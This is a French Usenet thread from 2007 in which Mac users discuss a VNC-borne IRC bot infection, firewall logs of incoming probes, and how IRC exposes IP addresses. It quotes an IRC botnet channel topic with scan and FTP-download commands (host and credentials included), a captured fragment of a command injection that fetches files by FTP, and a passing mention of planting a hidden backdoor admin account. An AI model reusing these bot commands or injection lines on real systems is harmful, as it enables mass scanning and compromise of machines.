:expozed.gov 005 L1-tn0o IRCX CHANTYPES=%#&+ MODES=6 NOQUIT SAFELIST WALLCHOPS NICKLEN=25 MAXCHANNELS=6 SILENCE=30 WATCH=128 :are available on this server
:expozed.gov 422 L1-tn0o :MOTD Not Present
:L1-tn0o MODE L1-tn0o :+ir
:expozed.gov 475 L1-tn0o #dbot :Cannot join channel (+k)

JOIN #dbot lock

:L1-tn0o!~yakr...@82.224.20.184 JOIN :#dbot
:expozed.gov 332 L1-tn0o #dbot :!scan 10 1 b 2 1 201.x.x.x !patch -s !bk 30 -s !setcftp ftp.hypermart.net 21 joh joh vncfull.exe
:expozed.gov 353 L1-tn0o @ #dbot :L1-tn0o
:expozed.gov 366 L1-tn0o #dbot :End of /NAMES list
:#dbot PRIVMSG #dbot :Leave Topic Alone!

PRIVMSG #dbot :Scanning: 201.x.x.x, 10 threads. Using CFTP.
PING :expozed.gov
PONG expozed.gov
JOIN #dbot lock

:expozed.gov 927 L1-tn0o #dbot :Already in the channel.

Et ensuite mon PC commence à faire ce qu'on lui a dit : scanner à fond
les manettes 201.0.0.0/8, direction port 5900.
Je ne l'ai pas laissé tourner assez longtemps pour voir ce qu'il se
passait quand il tombait sur une machine vulnérable, hein... ;->>>>

Un point positif : la merde est très facile à enlever.
On vit une époque formidable.
--
Nina

Message has been deleted

patpro ~ patrick proniewski

In article <9ddhu2lcaeao6507h...@4ax.com>,
Nina Popravka <Nina@nospam> wrote:

> Avec un machin IRC lancé en tâche de fond ?

> Terminal, netstat -a

j'ai une préférence pour netstat -alnf inet

patpro

--
http://www.patpro.net/

Nina Popravka

On Mon, 05 Mar 2007 18:43:58 +0100, patpro ~ patrick proniewski
<pat...@boleskine.patpro.net> wrote:

>j'ai une préférence pour netstat -alnf inet

Sûrement, mais je suis une dame âgée windowsienne, et je n'ai pas
encore réussi à mémoriser les paramètres de ps et ls.
Alors pour netstat, va falloir attendre 2008, je crains :-)
(je pense que je vais faire des fiches...)
--
Nina

Laurent Pertois

Nina Popravka <Nina@nospam> wrote:

> Tout le monde le fait. Pour parler de ce que je connais, NT depuis NT4
> au moins.

AppleShare IP le faisait pour le service AFP :-D

--
Politically Correct Unix - UTILITIES

Laurent Pertois

Nina Popravka <Nina@nospam> wrote:

> Note qu'au bout de 3 essais infructueux la carte est avalée, système
> qui est d'ailleurs également répandu en informatique sérieuse (compte
> désactivé au bout de x logins foirés)

Voui, et d'ailleurs dans une école Suisse où j'étais allé faire une
formation ça plaisait bien aux élèves qui bloquaient les comptes des
profs avec ça... :->>>>

Nina Popravka

On Mon, 5 Mar 2007 19:56:46 +0100, laurent...@alussinan.org
(Laurent Pertois) wrote:

>AppleShare IP le faisait pour le service AFP :-D

podom podom podom :-D
Dans NT4 par défaut le compte était niqué au bout de 3 essais (les
serveurs n'étaient pas encore grand public ;->>> )
J'avais très rapidement appris à créer un compte admin backdoor
planqué :-)
--
Nina

RiGuad

Bon , ben je reviens sur la ligne de front...

Concernant le sujet des preservatifs (si, si...) j'ai desactivé celui du
Mac parce qu'il ne parle que des connections sortantes mais pas
entrantes, desactivé celui de mon modem routeur TrendNet TEW-435BRM,
parce qu'il ne cause qu'anglais , et l'anglais et moi quand il s'agit de
sujets pointus, ca fait trois, j'ai quitté VNC le temps d'etre sûr de
mes acces entrants, parce que cette histoire m'a bien fait flipper,
et... Je me suis attelé a l'etude de NetBarrier X4 dans sa version 10.4.1.

En une matinée, l'historique de NetBarrier me dis ceci :
-------------------
05/03/2007 15:30:23 88.168.97.111 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 15:30:20 88.168.97.111 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 15:28:18 88.87.193.248 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 15:28:15 88.87.193.248 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 15:27:21 194.30.160.81 Blocage d'une connexion entrante TCP
eDonkey Client
05/03/2007 15:27:20 194.213.0.10 Blocage d'une connexion entrante TCP
eDonkey Client
05/03/2007 15:27:18 194.30.160.81 Blocage d'une connexion entrante TCP
eDonkey Client
05/03/2007 15:27:17 194.213.0.10 Blocage d'une connexion entrante TCP
eDonkey Client
05/03/2007 15:17:53 220.133.98.159 Blocage d'une connexion entrante TCP
HTTP - web service alternate
05/03/2007 15:16:13 220.133.98.147 Blocage d'une connexion entrante TCP
HTTP - web service alternate
05/03/2007 15:14:39 220.133.98.113 Blocage d'une connexion entrante TCP
HTTP - web service alternate
05/03/2007 15:13:23 84.103.92.231 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 15:13:20 84.103.92.231 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 14:40:47 81.248.154.72 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 14:35:13 81.248.195.207 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 14:35:11 81.248.195.207 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 14:32:39 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 14:32:36 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 14:27:06 211.100.33.61 Blocage d'une connexion entrante TCP
Port 8000
05/03/2007 14:27:03 211.100.33.61 Blocage d'une connexion entrante TCP
Port 8000
05/03/2007 14:19:07 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 14:19:04 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:59:36 62.183.86.66 Blocage d'une connexion entrante TCP
Port 4899
05/03/2007 13:54:12 80.32.178.97 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:54:06 80.32.178.97 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:54:03 80.32.178.97 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:48:55 209.120.245.115 Blocage d'une connexion entrante
TCP MySQL
05/03/2007 13:48:52 209.120.245.115 Blocage d'une connexion entrante
TCP MySQL
05/03/2007 13:43:07 61.236.145.121 Blocage d'une connexion entrante TCP
Microsoft SQL Server
05/03/2007 13:36:51 88.87.193.248 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:36:48 88.87.193.248 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:34:50 81.241.77.118 Blocage d'une connexion entrante TCP
Port 2967
05/03/2007 13:28:41 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:28:39 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:28:02 66.16.198.33 Blocage d'une connexion entrante TCP
Port 4899
05/03/2007 13:19:42 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:19:40 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:12:14 81.248.177.62 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:12:11 81.248.177.62 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:02:03 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 13:02:00 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:47:48 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:47:45 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:46:11 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:46:08 81.248.90.177 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:43:38 81.198.15.24 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:43:35 81.198.15.24 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:39:26 81.248.177.62 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:39:26 81.248.177.62 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:39:23 81.248.177.62 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:35:25 90.13.165.129 Blocage d'une connexion entrante TCP
Port 26661
05/03/2007 12:35:19 90.13.165.129 Blocage d'une connexion entrante TCP
Port 26661
05/03/2007 12:35:16 90.13.165.129 Blocage d'une connexion entrante TCP
Port 26661
05/03/2007 12:22:34 125.225.110.90 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:22:31 125.225.110.90 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:18:37 213.22.171.77 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 12:18:34 213.22.171.77 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 11:37:23 81.248.248.253 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 11:37:20 81.248.248.253 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 09:58:47 90.31.199.36 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 09:58:44 90.31.199.36 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 09:51:12 211.218.38.109 Blocage d'une connexion entrante TCP VNC
05/03/2007 09:51:09 211.218.38.109 Blocage d'une connexion entrante TCP VNC
05/03/2007 09:47:10 90.31.106.175 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 09:47:06 90.31.106.175 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 09:05:18 90.31.106.175 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 09:05:15 90.31.106.175 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

05/03/2007 08:26:52 90.31.106.175 Blocage d'une connexion entrante TCP

SMB/CIFS - Windows file service

--------------

Je note qu'il est question d'eDonkey, appli que je n'ai pas sur mon Mac,
de VN, ce qui rejoint le concept d'attaque par VNC, mais tout de meme...
Nina me disait que je ne suis pas visé et tout cela est d'une grande
banalité sur le Web...Web que je pratique depuis 8 ans , et je n'ai
jamais eu ces phenomènes de scripts qui me gachent la vie.

Encore a l'instant, j'ouvre NetBarrier qq secondes, et... :
-------
(sySTE?ROOT5£SYSTE?"é`c,d:exec,d =c echo open forsqle:serveftp:net é& ::
IK 7ECHO USER ROKO SYFREDI //
--------
Ceci n'est qu'une partie , je n'ai pas pu tout chopper...
C'est quoi ces plans eDonkey et Roko syfredi ???

De plus je me dis que si un tel trafic vers mon Mac est présent , cela
doit nuire a ma bande passante, d'autant que je trouve mes connections
tres lentes depuis un mois.

Par ailleurs, Nina... quand tu dis...
----

[...]

------
"tres facile a enlever" tu te deconnectes du Net pour couper l'action
en cours? tu fais comment ?.

Bref, je me demande pourquoi j'ai ces phenomenes que je n'avais pas
avant et je ne vois toujours pas comment les arreter, autrement qu'en
demandant a NetBarrier de stopper les connections entrantes, ce qui
d'ailleurs me fait dire que je n'ai pas un virus déposé sur le disque
dur de mon Mac, mais que ce sont la des attaques externes permanentes.

RiGuad

Nina Popravka a écrit :

> [...]
> Dans la seconde qui suit le lancement du programme (qui n'était hier
> pas reconnu par la majorité des anti-virus), ma bécane va causer à un

Ceci confirme tout de meme que ca n'a pas l'air d'etre courant, ces
attaques sur des ordis de particuliers...

A propos d'autre chose...Parlant de ce sujet dans un salon IRC avec un
interlocuteur habituel, alors que j'etais sous Snak, et lui sous mIRC,
ce mecapc m'a fait la demo qu'il pouvait, en live, obtenir mon adresse
IP, pendant le tchat sous IRC.

Ca m'a scié, et bien sur, ne dérogeant pas au profil des mecapc frimeurs
comme c'est pas racontable, je n'ai pas eu d'explication de sa part.

Comment est il possible de recueillir l'adresse IP d'un interlocuteur
alors qu'on a un dialogue sous IRC avec lui ?

Merci de m'eclairer...

Laurent Pertois

Nina Popravka <Nina@nospam> wrote:

> podom podom podom :-D

Je savais que ça allait t'attirer ;-)

> Dans NT4 par défaut le compte était niqué au bout de 3 essais (les
> serveurs n'étaient pas encore grand public ;->>> )

Mouarf...

> J'avais très rapidement appris à créer un compte admin backdoor
> planqué :-)

Ben, tu vois, MS t'a copié pour XP ;-)

patpro ~ patrick proniewski

In article <45ec7659$0$5097$ba4a...@news.orange.fr>,
RiGuad <RiG...@KkBoodin.wanadoo.fr> wrote:

holala... ça fait longtemps que tu fais de l'IRC ? Parce que bon, l'IP
de connexion d'une personne sur IRC, c'est l'affaire de 2 secondes,
c'est une donnée publique (contrairement à des MSN et autres AIM).

patpro

--
http://www.patpro.net/

RiGuad

> [...]
> de connexion d'une personne sur IRC, c'est l'affaire de 2 secondes,
> c'est une donnée publique (contrairement à des MSN et autres AIM).

Ben d'abord je ne me suis jamais interessé a l'obtention des IP des
gens, et ensuite sur les salons Orange que je pratique, les IP ne sont
pas visibles contrairement a d'autres.
Quand je dis "visibles" , c'est vraiment visbles sans manip, genre a
droite du pseudo, sur certains salons , tu vois le userhost complet , IP
comprite...
Mais sur les salons Orange, les userhost sont codés, il sont pas en clair.
Alors j'aimerais bien savoir comment ce frimeur le fait...

RiGuad

RiGuad a écrit :

Euh... je complete là... de memoire Snak dans sa derniere version
accepte une commande "/dns", je crois que c'est en rapport...
MAis elle ne donne rien, cette commande, pas d'IP.

Nina Popravka

On Mon, 05 Mar 2007 15:58:14 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Ceci confirme tout de meme que ca n'a pas l'air d'etre courant, ces
>attaques sur des ordis de particuliers...

Hum... t'es bouché, ou quoi ????
Ca fait 3 jours que je perd mon temps à t'expliquer que c'est le
quotidien, et que des milliers de machines passent leur vie
(involontairement en général) à arpenter le net à la recherche de
failles.

>Comment est il possible de recueillir l'adresse IP d'un interlocuteur
>alors qu'on a un dialogue sous IRC avec lui ?

De la même manière que tout le monde connaît la tienne quand tu postes
ici, où est le problème ??????????
--
Nina

Nina Popravka

On Mon, 5 Mar 2007 21:00:35 +0100, laurent...@alussinan.org
(Laurent Pertois) wrote:

>Je savais que ça allait t'attirer ;-)

Ah ne m'énerve pas, et imagine rétrospectivement ma tronche y a ...
quelques années, quand un client me sortait "abin tout compte fait on
prend un ASIP, paraît que c'est plus pro que NT4"
Hallu totale.
--
Nina

RiGuad

Nina Popravka a écrit :

> De la même manière que tout le monde connaît la tienne quand tu postes
> ici, où est le problème ??????????

Ben ici ou dans les transactions pas mail , il suffit de lire les
entetes, mais dans un dialogue IRC, ya pas d'entete...Tu as le fenetre
de dialogue a la msn, mais dans laquelle tu peux taper des comandes
precedées de "/" alors a moins d'une commande que je ne connait pas , je
ne vois pas , sachant que les userhost des Pseudos sont souvent codés...

Nina Popravka

On Mon, 05 Mar 2007 16:22:30 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>MAis elle ne donne rien, cette commande, pas d'IP.

Mais tout le monde s'en fout, que tu sois 81.248.178.163 à l'heure où
tu postes.
Rien n'est dirigé contre toi spécifiquement.
--
Nina

patpro ~ patrick proniewski

In article <45ec7b83$0$5096$ba4a...@news.orange.fr>,
> [...]

> Mais sur les salons Orange, les userhost sont codés, il sont pas en clair.
> Alors j'aimerais bien savoir comment ce frimeur le fait...

et /whois avec ton login ? :)

(c'est quoi ces serveurs IRC qui masquent l'IP ??)

patpro

--
http://www.patpro.net/

Message has been deleted

Nina Popravka

On Mon, 05 Mar 2007 22:04:23 +0100, patpro ~ patrick proniewski
<pat...@boleskine.patpro.net> wrote:

>et /whois avec ton login ? :)
>(c'est quoi ces serveurs IRC qui masquent l'IP ??)

Heu... à ton âge tu nous démarres une carrière de hAckErz , ou quoi
??????????????????
--
Nina

Henri Balmain

RiGuad <RiG...@KkBoodin.wanadoo.fr> wrote:
> Bref, je me demande pourquoi j'ai ces phenomenes que je n'avais pas
> avant
ben, t'avais laissé une porte et quelqu'un a tourné la poignée pour voir
si c'étais vraiement fermé ...

> [...]
> d'ailleurs me fait dire que je n'ai pas un virus déposé sur le disque
> dur de mon Mac, mais que ce sont la des attaques externes permanentes.

Autant que je sache, NetBarrier n'est qu'une interface de daemons Unix
préxistants

Le firewall du Macounet (qui fait appel aux dits daemons) marche dans
Préférences Système => Partage => coupe-feu, cliquer sur (Démarrer),
décocher tout ce qu'il l'est sauf ce dont on a besoin quand on en a
besoin, cliquer sur (Avancé) en bas à droite et cliquer les trois cases
Bloquer le trafic UDP (sauf su on faot du P2P) Activer la conservation
de l'historique du coupe-feu et Activer le mode furtif

Pour vivre heureux, vivons cachés ;-)

Sinon, si tu veux te donner des angoisses, tu as Utilitaire de réseau et
Netstat ou Port scan ...

Henri
--
Henri Balmain
http://freenours.org

Julien Salort

> [...]

> precedées de "/" alors a moins d'une commande que je ne connait pas , je
> ne vois pas , sachant que les userhost des Pseudos sont souvent codés...

Je ne suis pas spécialiste d'IRC mais :
/whois pseudo_du_gars
ça le fait non ?

Sinon :
/help
pour avoir la liste des commandes

--
R: Parce que ça renverse bêtement l'ordre naturel de lecture!
Q: Mais pourquoi citer en fin d'article est-il si effroyable?

patpro ~ patrick proniewski

In article <qh1pu2tgt5i6cnj0n...@4ax.com>,
Nina Popravka <Nina@nospam> wrote:

ben franchement, je fréquente qu'IRCnet, et donc j'ai toujours eu les IP
visibles.

patpro

--
http://www.patpro.net/

RiGuad

patpro ~ patrick proniewski a écrit :

> et /whois avec ton login ? :)

ben ca donne ca :

Macounet is gu...@3356634835.fr (Mozilla/4.0 (Compatible; MSIE 7.0;
Windows NT 5.1;)
on channels: #!domtom! on irc via server chat1.x-echo.com (Serveur
t'Chat) has identified for this nick

> (c'est quoi ces serveurs IRC qui masquent l'IP ??)

Ce sont les serveur IRC de Orange irc.voila.fr accessible là par
le webchat:

http://www.orange.fr/bin/frame.cgi?u=http%3A//tchat.orange.fr/v4authClientLourd1.php

Laurent Pertois

> [...]

> quelques années, quand un client me sortait "abin tout compte fait on
> prend un ASIP, paraît que c'est plus pro que NT4"

Bah, ça lui paraissait sûrement plus simple, en tous cas ;-)

Nina Popravka

On Mon, 5 Mar 2007 22:49:01 +0100, laurent...@alussinan.org
(Laurent Pertois) wrote:

>Bah, ça lui paraissait sûrement plus simple, en tous cas ;-)

1- je te merde
2 - pour un laïc, les eux étaient imbitables, autant prendre celui qui
sait faire quelque chose
3 - arrête de troller :-)
--
Nina

Serge Horrent

Gerald <Ger...@alussinan.org> wrote:

> Et pour ce qui est du post-it : oui il existe *mais* c'est un fake :-)
> juste pour énerver ! (pas totalement fake d'ailleurs mais seulement pour
> me remettre sur la voie).

L'idéal restant le openssl ET le postit... avec un faux passe ;-)

Serge

--
Léda Atomica Musique...
Une visite s'impose ;-)

Laurent Pertois

Henri Balmain <Henripasd...@freenours.org> wrote:

> Autant que je sache, NetBarrier n'est qu'une interface de daemons Unix
> préxistants

Non, pas que, sjmsb.

RiGuad

Julien Salort a écrit :

> Je ne suis pas spécialiste d'IRC mais :
> /whois pseudo_du_gars
> ça le fait non ?

Ben en principe oui , mais je crois en fait que ce sont les serveurs de
Wanadoo Orange qui masquent l'IP et mettent autre chose a la place.
(accessible ici : )
http://www.orange.fr/bin/frame.cgi?u=http%3A//tchat.orange.fr/v4authClientLourd1.php

d'ou ma question, "comment le mecapc a t'il procédé ? "

Nina Popravka

On Mon, 05 Mar 2007 22:39:51 +0100, patpro ~ patrick proniewski
<pat...@boleskine.patpro.net> wrote:

>ben franchement, je fréquente qu'IRCnet, et donc j'ai toujours eu les IP
>visibles.

Je cauchemarde...
Je pensais être entourée de barbus, je me retrouve au milieu de
suppôts de MSN.
--
Nina

Nina Popravka

On Mon, 05 Mar 2007 18:03:03 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>d'ou ma question, "comment le mecapc a t'il procédé ? "

Chépa... Ta femme a cafté ?
--
Nina

RiGuad

RiGuad a écrit :

Ou plutot non... l'adresse ci dessus c'est pour les mIRC et autres Snak...

Les Lambdas y accedent ici par le webtchat:
http://www.orange.fr/bin/frame.cgi?u=http://tchat.orange.fr

RiGuad

Nina Popravka a écrit :

lol... encore eut il fallut que j'en eusse une (Sassdissa ?)

Message has been deleted

Nina Popravka

On Mon, 05 Mar 2007 18:10:23 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>lol... encore eut il fallut que j'en eusse une (Sassdissa ?)

Ok... d'oů l'explication d'IRC.
T'as Meetic, aussi... le panel est plus large.
--
Nina

Nina Popravka

On Mon, 05 Mar 2007 23:17:18 +0100, Erwan David <er...@rail.eu.org>
wrote:

>Ben on trouve pas mal de barbus sur IRCNet. Nettement plsu que sur
>MSN...

Je sais... Mais fonctionnellement je ne supporte ni l'un ni l'autre.
Le "je te vois mais tu me réponds pas" , je peux pas.
--
Nina

patpro ~ patrick proniewski

In article <js4pu2phtno1ugg8r...@4ax.com>,
Nina Popravka <Nina@nospam> wrote:

holala, mais que dis tu malheureuse ! :)
Va pas nous mélanger avec les kikooteurs d'MSN !

patpro

--
http://www.patpro.net/

patpro ~ patrick proniewski

In article <45ec9017$0$5107$ba4a...@news.orange.fr>,

> Ce sont les serveur IRC de Orange irc.voila.fr accessible là par
> le webchat:

... Si t'es en webchat, c'est normal qu'on voit pas ton IP, vu que c'est
le serveur web qui est connecté à l'ircd.

patpro

--
http://www.patpro.net/

RiGuad

Nina Popravka a écrit :

> Ok... d'où l'explication d'IRC.

> T'as Meetic, aussi... le panel est plus large.

Ah non , je t'en prie , pas toi Nina... l'IRC et ses canaux c'est pas
systematiquement le minitel rose, il y a des chan specifiques pour ca ,
genre "Charme".
Mais les milliers de dials qui s'echangent par jour sur l'IRC (dont
MacBidouille use efficacement en ayant créé son chan sur
irc.inet.tele.dk, sans parler de celui de Mac4ever...) ne traitent pas
forcément du theme de meetic.
et la comme tu dis , le "je vois ta tronche sur catalogue mais je'te
connais pas, j'peux pas...

Nina Popravka

On Mon, 05 Mar 2007 23:32:41 +0100, patpro ~ patrick proniewski
<pat...@boleskine.patpro.net> wrote:

>Va pas nous mélanger avec les kikooteurs d'MSN !

Heu... kikoooooooooooo Pat ?
;-)
--
Nina

RiGuad

patpro ~ patrick proniewski a écrit :

Tootafé , mais par un Client IRC genre Snak que j'utilise, c'est itou...
no IP, mais IP remplacé par une suite de chiffre... c'est chiadé, hein ?

Nina Popravka

On Mon, 05 Mar 2007 18:37:50 -0400, RiGuad
<RiG...@KkBoodin.wanadoo.fr> wrote:

>Mais les milliers de dials qui s'echangent par jour sur l'IRC (dont

>MacBidouille use efficacement en ayant crיי son chan sur
>irc.inet.tele.dk

Chouette, je sens que je vais y croiser Laurent Pertois.
Laurent, viendez, y a un chan MacBidouille !!!!!!!!
--
Nina

Laurent Pertois

Nina Popravka <Nina@nospam> wrote:

> 1- je te merde

Rhooohhhh

> 2 - pour un laïc, les eux étaient imbitables, autant prendre celui qui
> sait faire quelque chose

M'en fous, j'suis abbé

> 3 - arrête de troller :-)

Moooaaaaaa ?!? jamais !

Laurent Pertois

Serge Horrent <min...@free.fr.INVALID> wrote:

> L'idéal restant le openssl ET le postit... avec un faux passe ;-)

Bah, il y a aussi un truc intégré dans Mac OS X, on peut le voir quand
on fait un nouveau trousseau, un nouvel utilisateur, on modifie son mot
de passe...

Et il y a une appli qui permet de l'appeler :

<http://www.codepoetry.net/products/passwordassistant>

Laurent Pertois

Nina Popravka <Nina@nospam> wrote:

> Je sais... Mais fonctionnellement je ne supporte ni l'un ni l'autre.
> Le "je te vois mais tu me réponds pas" , je peux pas.

Fais comme moi, lis les extraits sur bashfr.org :)

It is loading more messages.